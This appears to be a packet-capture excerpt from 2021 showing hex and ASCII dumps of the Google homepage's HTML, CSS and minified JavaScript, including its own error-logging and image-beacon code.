                                                                    2021-10-27 14:29:02 UTC0INData Raw: 34 64 39 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65
                                                                    Data Ascii: 4d99<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en-GB"><head><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image
                                                                    2021-10-27 14:29:02 UTC1INData Raw: 30 2c 31 35 37 35 37 2c 33 2c 35 37 36 2c 31 30 31 34 2c 31 2c 35 34 34 34 2c 31 34 39 2c 31 31 33 32 33 2c 39 39 31 2c 31 36 36 31 2c 34 2c 31 35 32 38 2c 32 33 30 34 2c 31 32 33 38 2c 35 38 30 31 2c 37 34 2c 31 39 38 33 2c 32 36 32 36 2c 32 30 31 35 2c 31 33 36 31 31 2c 34 37 36 34 2c 32 36 35 38 2c 37 33 35 37 2c 33 30 2c 35 36 31 36 2c 38 30 31 32 2c 31 35 39 33 2c 37 31 32 2c 36 33 38 2c 31 34 39 34 2c 31 36 37 38 36 2c 35 38 31 38 2c 32 35 33 39 2c 34 30 39 34 2c 33 31 33 38 2c 36 2c 39 30 38 2c 33 2c 33 35 34 31 2c 31 2c 35 30 39 36 2c 32 2c 31 2c 33 2c 36 38 34 31 2c 32 37 36 37 2c 31 38 31 34 2c 32 38 33 2c 33 38 2c 38 37 34 2c 35 39 39 32 2c 31 34 36 35 39 2c 37 38 38 2c 38 2c 32 2c 31 32 37 31 2c 31 37 31 35 2c 32 2c 38 34 39 36 2c 37 31 37 2c
                                                                    Data Ascii: 0,15757,3,576,1014,1,5444,149,11323,991,1661,4,1528,2304,1238,5801,74,1983,2626,2015,13611,4764,2658,7357,30,5616,8012,1593,712,638,1494,16786,5818,2539,4094,3138,6,908,3,3541,1,5096,2,1,3,6841,2767,1814,283,38,874,5992,14659,788,8,2,1271,1715,2,8496,717,
                                                                    2021-10-27 14:29:02 UTC2INData Raw: 63 74 69 6f 6e 28 29 7b 0a 76 61 72 20 66 3d 74 68 69 73 7c 7c 73 65 6c 66 3b 76 61 72 20 68 2c 6b 3d 5b 5d 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3b 61 26 26 28 21 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 7c 7c 21 28 62 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 65 69 64 22 29 29 29 3b 29 61 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 7c 7c 68 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 6e 75 6c 6c 3b 61 26 26 28 21 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 7c 7c 21 28 62 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6c 65 69 64 22 29 29 29 3b 29 61 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 7d 0a 66 75 6e 63 74 69 6f 6e 20 6e 28 61
                                                                    Data Ascii: ction(){var f=this||self;var h,k=[];function l(a){for(var b;a&&(!a.getAttribute||!(b=a.getAttribute("eid")));)a=a.parentNode;return b||h}function m(a){for(var b=null;a&&(!a.getAttribute||!(b=a.getAttribute("leid")));)a=a.parentNode;return b}function n(a
                                                                    2021-10-27 14:29:02 UTC3INData Raw: 6f 6e 28 29 7b 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 67 6f 6f 67 6c 65 2e 66 3d 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 75 62 6d 69 74 22 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 61 3b 69 66 28 61 3d 62 2e 74 61 72 67 65 74 29 7b 76 61 72 20 63 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 75 62 6d 69 74 66 61 6c 73 65 22 29 3b 61 3d 22 31 22 3d 3d 3d 63 7c 7c 22 71 22 3d 3d 3d 63 26 26 21 61 2e 65 6c 65 6d 65 6e 74 73 2e 71 2e 76 61 6c 75 65 3f 21 30 3a 21 31 7d 65 6c 73 65 20 61 3d 21 31 3b 61 26 26 28 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 62 2e 73 74 6f
                                                                    Data Ascii: on(){};}).call(this);google.f={};(function(){document.documentElement.addEventListener("submit",function(b){var a;if(a=b.target){var c=a.getAttribute("data-submitfalse");a="1"===c||"q"===c&&!a.elements.q.value?!0:!1}else a=!1;a&&(b.preventDefault(),b.sto
                                                                    2021-10-27 14:29:02 UTC5INData Raw: 62 67 20 2e 67 62 74 63 62 7b 6c 65 66 74 3a 30 7d 2e 67 62 78 78 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 78 6f 7b 6f 70 61 63 69 74 79 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 69 6c 74 65 72 3a 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 30 29 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 6d 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 3b 74 6f 70 3a 2d 39 39 39 70 78 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 2d 31 70 78 20 31 70 78 20
                                                                    Data Ascii: bg .gbtcb{left:0}.gbxx{display:none !important}.gbxo{opacity:0 !important;filter:alpha(opacity=0) !important}.gbm{position:absolute;z-index:999;top:-999px;visibility:hidden;text-align:left;border:1px solid #bebebe;background:#fff;-moz-box-shadow:-1px 1px
                                                                    2021-10-27 14:29:02 UTC6INData Raw: 69 6e 64 65 78 3a 32 3b 7a 6f 6f 6d 3a 31 7d 2e 67 62 74 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 69 6e 6c 69 6e 65 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 7d 2e 67 62 74 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 67 62 74 6f 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32
                                                                    Data Ascii: index:2;zoom:1}.gbt{position:relative;display:-moz-inline-box;display:inline-block;line-height:27px;padding:0;vertical-align:top}.gbt{*display:inline}.gbto{box-shadow:0 2px 4px rgba(0,0,0,.2);-moz-box-shadow:0 2px 4px rgba(0,0,0,.2);-webkit-box-shadow:0 2
                                                                    2021-10-27 14:29:02 UTC7INData Raw: 31 30 32 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 78 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 70 64 6a 73 20 2e 67 62 74 6f 20 2e 67 62 6d 7b 6d 69 6e 2d 77 69 64 74 68 3a 39 39 25 7d 2e 67 62 7a 30 6c 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 23 64 64 34 62 33 39 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 34 73 2c 23 67 62 69 34 73 31 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 23 67 62 67 36 2e 67 62 67 74 2d 68 76 72 2c 23 67 62 67 36 2e 67 62 67 74 3a 66 6f 63 75 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 61
                                                                    Data Ascii: 102px;background-repeat:repeat-x;outline:none;text-decoration:none !important}.gbpdjs .gbto .gbm{min-width:99%}.gbz0l .gbtb2{border-top-color:#dd4b39!important}#gbi4s,#gbi4s1{font-weight:bold}#gbg6.gbgt-hvr,#gbg6.gbgt:focus{background-color:transparent;ba
                                                                    2021-10-27 14:29:02 UTC8INData Raw: 74 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 39 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 6d 74 2c 2e 67 62 6d 6c 31 2c 2e 67 62 6d 6c 62 2c 2e 67 62 6d 74 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 31 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 33 36 63 20 21 69 6d 70 6f 72 74 61 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 6d 74 2c 2e 67 62 6d 74 3a 76 69 73 69 74 65 64 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 67 62 6d 6c 31 2c 2e 67 62 6d 6c 62 2c 2e 67 62 6d 6c 31 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e
                                                                    Data Ascii: t:visited{color:#900 !important}.gbmt,.gbml1,.gbmlb,.gbmt:visited,.gbml1:visited,.gbmlb:visited{color:#36c !important;text-decoration:none !important}.gbmt,.gbmt:visited{display:block}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{display:inline-block;margin
                                                                    2021-10-27 14:29:02 UTC10INData Raw: 74 63 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 7d 2e 47 42 4d 43 43 3a 6c 61 73 74 2d 63 68 69 6c 64 3a 61 66 74 65 72 2c 23 47 42 4d 50 41 4c 3a 6c 61 73 74 2d 63 68 69 6c 64 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 27 5c 30 41 5c 30 41 27 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 23 67 62 6d 70 73 7b 2a 7a 6f 6f 6d 3a 31 7d 23 67 62 64 34 20 2e 67 62 70 63 2c 23 67 62 6d 70 61 73 20 2e 67 62 6d 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 37 70 78 7d 23 67 62 64 34 20 2e 67 62 70 67 73 20 2e 67 62 6d 74 63 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 7d 23 67 62 64 34 20 2e 67 62 6d 74 63 7b 62 6f 72 64 65 72 2d 62
                                                                    Data Ascii: tc{padding:0;margin:0;line-height:27px}.GBMCC:last-child:after,#GBMPAL:last-child:after{content:'\0A\0A';white-space:pre;position:absolute}#gbmps{*zoom:1}#gbd4 .gbpc,#gbmpas .gbmt{line-height:17px}#gbd4 .gbpgs .gbmtc{line-height:27px}#gbd4 .gbmtc{border-b
                                                                    2021-10-27 14:29:02 UTC11INData Raw: 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 23 67 62 6d 70 61 73 62 20 2e 67 62 70 73 7b 63 6f 6c 6f 72 3a 23 30 30 30 7d 23 67 62 6d 70 61 6c 20 2e 67 62 71 66 62 62 7b 6d 61 72 67 69 6e 3a 30 20 32 30 70 78 7d 2e 67 62 70 30 20 2e 67 62 70 73 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 61 2e 67 62 69 62 61 7b 6d 61 72 67 69 6e 3a 38 70 78 20 32 30 70 78 20 31 30 70 78 7d 2e 67 62 6d 70 69 61 77 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 67 62 78 76 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 67 62 6d 70 69 61 61 7b 64 69 73
                                                                    Data Ascii: ght:0;text-align:right}#gbmpasb .gbps{color:#000}#gbmpal .gbqfbb{margin:0 20px}.gbp0 .gbps{*display:inline}a.gbiba{margin:8px 20px 10px}.gbmpiaw{display:inline-block;padding-right:10px;margin-bottom:6px;margin-top:10px}.gbxv{visibility:hidden}.gbmpiaa{dis
                                                                    2021-10-27 14:29:02 UTC12INData Raw: 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 7d 2e 67 62 71 66 62 2d 68 76 72 2c 2e 67 62 71 66 62 61 2d 68 76 72 2c 2e 67 62 71 66 62 62 2d 68 76 72 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 7d 2e 67 62 71 66 62 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 2e 67 62 71 66 62 61 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 2e 67 62 71 66 62 62 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d
                                                                    Data Ascii: shadow:none;box-shadow:none}.gbqfb-hvr,.gbqfba-hvr,.gbqfbb-hvr{-webkit-box-shadow:0 1px 1px rgba(0,0,0,.1);-moz-box-shadow:0 1px 1px rgba(0,0,0,.1);box-shadow:0 1px 1px rgba(0,0,0,.1)}.gbqfb::-moz-focus-inner,.gbqfba::-moz-focus-inner,.gbqfbb::-moz-focus-
                                                                    2021-10-27 14:29:02 UTC14INData Raw: 61 64 69 65 6e 74 28 74 6f 70 2c 23 34 64 39 30 66 65 2c 23 33 35 37 61 65 38 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6f 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 34 64 39 30 66 65 2c 23 33 35 37 61 65 38 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 34 64 39 30 66 65 2c 23 33 35 37 61 65 38 29 7d 2e 67 62 71 66 62 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 33 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30
                                                                    Data Ascii: adient(top,#4d90fe,#357ae8);background-image:-o-linear-gradient(top,#4d90fe,#357ae8);background-image:linear-gradient(top,#4d90fe,#357ae8)}.gbqfb:active{background-color:inherit;-webkit-box-shadow:inset 0 1px 2px rgba(0, 0, 0, 0.3);-moz-box-shadow:inset 0
                                                                    2021-10-27 14:29:02 UTC15INData Raw: 4d 69 63 72 6f 73 6f 66 74 2e 67 72 61 64 69 65 6e 74 28 73 74 61 72 74 43 6f 6c 6f 72 53 74 72 3d 27 23 66 38 66 38 66 38 27 2c 45 6e 64 43 6f 6c 6f 72 53 74 72 3d 27 23 66 31 66 31 66 31 27 29 7d 2e 67 62 71 66 62 62 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 67 72 61 64 69 65 6e 74 28 6c 69 6e 65 61 72 2c 6c 65 66 74 20 74 6f 70 2c 6c 65 66 74 20 62 6f 74 74 6f 6d 2c 66 72 6f 6d 28 23 66 66 66 29 2c 74 6f 28 23 66 62 66 62 66 62 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 66 66 66 2c 23 66 62 66 62 66 62 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61
                                                                    Data Ascii: Microsoft.gradient(startColorStr='#f8f8f8',EndColorStr='#f1f1f1')}.gbqfbb{background-color:#fff;background-image:-webkit-gradient(linear,left top,left bottom,from(#fff),to(#fbfbfb));background-image:-webkit-linear-gradient(top,#fff,#fbfbfb);background-ima
                                                                    2021-10-27 14:29:02 UTC16INData Raw: 65 2c 2e 67 62 71 66 62 62 3a 61 63 74 69 76 65 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 7d 0a 23 67 62 6d 70 61 73 7b 6d 61 78 2d 68 65 69 67 68 74 3a 32 32 30 70 78 7d 23 67 62 6d 6d 7b 6d 61 78 2d 68 65 69 67 68 74 3a 35 33 30 70 78 7d 2e 67 62 73 62 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b
                                                                    Data Ascii: e,.gbqfbb:active{-webkit-box-shadow:inset 0 1px 2px rgba(0,0,0,.1);-moz-box-shadow:inset 0 1px 2px rgba(0,0,0,.1);box-shadow:inset 0 1px 2px rgba(0,0,0,.1)}#gbmpas{max-height:220px}#gbmm{max-height:530px}.gbsb{-webkit-box-sizing:border-box;display:block;
                                                                    2021-10-27 14:29:02 UTC17INData Raw: 6f 72 2d 73 74 6f 70 28 30 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 29 2c 63 6f 6c 6f 72 2d 73 74 6f 70 28 2e 35 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 38 29 29 2c 63 6f 6c 6f 72 2d 73 74 6f 70 28 31 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 2d 77 65 62 6b 69 74 2d 67 72 61 64 69 65 6e 74 28 6c 69 6e 65 61 72 2c 6c 65 66 74 20 62 6f 74 74 6f 6d 2c 6c 65 66 74 20 74 6f 70 2c 66 72 6f 6d 28 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 29 2c 74 6f 28 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 62 6f 74 74 6f 6d 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 2c 72 67 62 61 28 30 2c 30 2c 30
                                                                    Data Ascii: or-stop(0,rgba(0,0,0,.1)),color-stop(.5,rgba(0,0,0,.8)),color-stop(1,rgba(0,0,0,.1)));background:-webkit-gradient(linear,left bottom,left top,from(rgba(0,0,0,.2)),to(rgba(0,0,0,0)));background-image:-webkit-linear-gradient(bottom,rgba(0,0,0,.2),rgba(0,0,0
                                                                    2021-10-27 14:29:02 UTC19INData Raw: 6d 61 72 67 69 6e 3a 32 70 78 20 30 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 33 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 7d 2e 6c 73 62 62 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 38 66 39 66 61 3b 62 6f 72 64 65 72 3a 73 6f 6c 69 64 20 31 70 78 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 61 64 63 65 30 20 23 37 30 37 35 37 61 20 23 37 30 37 35 37 61 20 23 64 61 64 63 65 30 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 6c 73 62 62 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 23 57 71 51 41 4e 62 20 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 6c 73 62 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 69 6d 61 67 65 73 2f 6e 61 76 5f 6c 6f 67 6f 32 32 39 2e 70 6e 67 29 20 30
                                                                    Data Ascii: margin:2px 0;margin-left:13px;font-size:11px}.lsbb{background:#f8f9fa;border:solid 1px;border-color:#dadce0 #70757a #70757a #dadce0;height:30px}.lsbb{display:block}#WqQANb a{display:inline-block;margin:0 12px}.lsb{background:url(/images/nav_logo229.png) 0
                                                                    2021-10-27 14:29:02 UTC20INData Raw: 63 62 0d 0a 21 62 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 6e 2b 2b 3b 65 3d 65 7c 7c 7b 7d 3b 62 3d 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 3b 76 61 72 20 63 3d 22 2f 67 65 6e 5f 32 30 34 3f 61 74 79 70 3d 69 26 65 69 3d 22 2b 62 28 67 6f 6f 67 6c 65 2e 6b 45 49 29 3b 67 6f 6f 67 6c 65 2e 6b 45 58 50 49 26 26 28 63 2b 3d 22 26 6a 65 78 70 69 64 3d 22 2b 62 28 67 6f 6f 67 6c 65 2e 6b 45 58 50 49 29 29 3b 63 2b 3d 22 26 73 72 63 70 67 3d 22 2b 62 28 71 2e 73 70 29 2b 22 26 6a 73 72 3d 22 2b 62 28 71 2e 6a 73 72 29 2b 22 26 62 76 65 72 3d 22 2b 62 28 71 2e 62 76 29 2b 28 22 26 6a 73 65 6c 3d 22 2b 64 29 0d 0a
                                                                    Data Ascii: cb!b)return null;n++;e=e||{};b=encodeURIComponent;var c="/gen_204?atyp=i&ei="+b(google.kEI);google.kEXPI&&(c+="&jexpid="+b(google.kEXPI));c+="&srcpg="+b(q.sp)+"&jsr="+b(q.jsr)+"&bver="+b(q.bv)+("&jsel="+d)
                                                                    2021-10-27 14:29:02 UTC20INData Raw: 37 31 65 66 0d 0a 3b 63 2b 3d 22 26 73 6e 3d 22 2b 62 28 67 6f 6f 67 6c 65 2e 73 6e 29 3b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 65 29 63 2b 3d 22 26 22 2c 63 2b 3d 62 28 72 29 2c 63 2b 3d 22 3d 22 2c 63 2b 3d 62 28 65 5b 72 5d 29 3b 63 3d 63 2b 22 26 65 6d 73 67 3d 22 2b 62 28 61 2e 6e 61 6d 65 2b 22 3a 20 22 2b 61 2e 6d 65 73 73 61 67 65 29 3b 63 3d 63 2b 22 26 6a 73 73 74 3d 22 2b 62 28 61 2e 73 74 61 63 6b 7c 7c 22 4e 2f 41 22 29 3b 31 32 32 38 38 3c 3d 63 2e 6c 65 6e 67 74 68 26 26 28 63 3d 63 2e 73 75 62 73 74 72 28 30 2c 31 32 32 38 38 29 29 3b 61 3d 63 3b 6d 7c 7c 67 6f 6f 67 6c 65 2e 6c 6f 67 28 30 2c 22 22 2c 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 77 69 6e 64 6f 77 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 65 2c 6d 2c 64
                                                                    Data Ascii: 71ef;c+="&sn="+b(google.sn);for(var r in e)c+="&",c+=b(r),c+="=",c+=b(e[r]);c=c+"&emsg="+b(a.name+": "+a.message);c=c+"&jsst="+b(a.stack||"N/A");12288<=c.length&&(c=c.substr(0,12288));a=c;m||google.log(0,"",a);return a};window.onerror=function(a,b,e,m,d
                                                                    2021-10-27 14:29:02 UTC21INData Raw: 63 74 69 6f 6e 28 29 7b 7d 2c 68 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 6b 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 6e 65 77 20 49 6d 61 67 65 2c 63 3d 69 61 3b 62 2e 6f 6e 65 72 72 6f 72 3d 62 2e 6f 6e 6c 6f 61 64 3d 62 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 64 65 6c 65 74 65 20 6a 61 5b 63 5d 7d 63 61 74 63 68 28 64 29 7b 7d 7d 3b 6a 61 5b 63 5d 3d 62 3b 62 2e 73 72 63 3d 61 3b 69 61 3d 63 2b 31 7d 2c 6a 61 3d 5b 5d 2c 69 61 3d 30 3b 70 28 22 6c 6f 67 67 65 72 22 2c 7b 69 6c 3a 68 61 2c 6d 6c 3a 74 2c 6c 6f 67 3a 6b 61 7d 29 3b 76 61 72 20 75 3d 77 69 6e 64 6f 77 2e 67 62 61 72 2e 6c 6f 67 67 65 72 3b 76 61 72 20 76 3d 7b 7d 2c 6c 61 3d 7b 7d 2c 77 3d 5b 5d 2c 6d 61 3d 68 2e 62 28 22 30 2e 31 22
                                                                    Data Ascii: ction(){},ha=function(){},ka=function(a){var b=new Image,c=ia;b.onerror=b.onload=b.onabort=function(){try{delete ja[c]}catch(d){}};ja[c]=b;b.src=a;ia=c+1},ja=[],ia=0;p("logger",{il:ha,ml:t,log:ka});var u=window.gbar.logger;var v={},la={},w=[],ma=h.b("0.1"
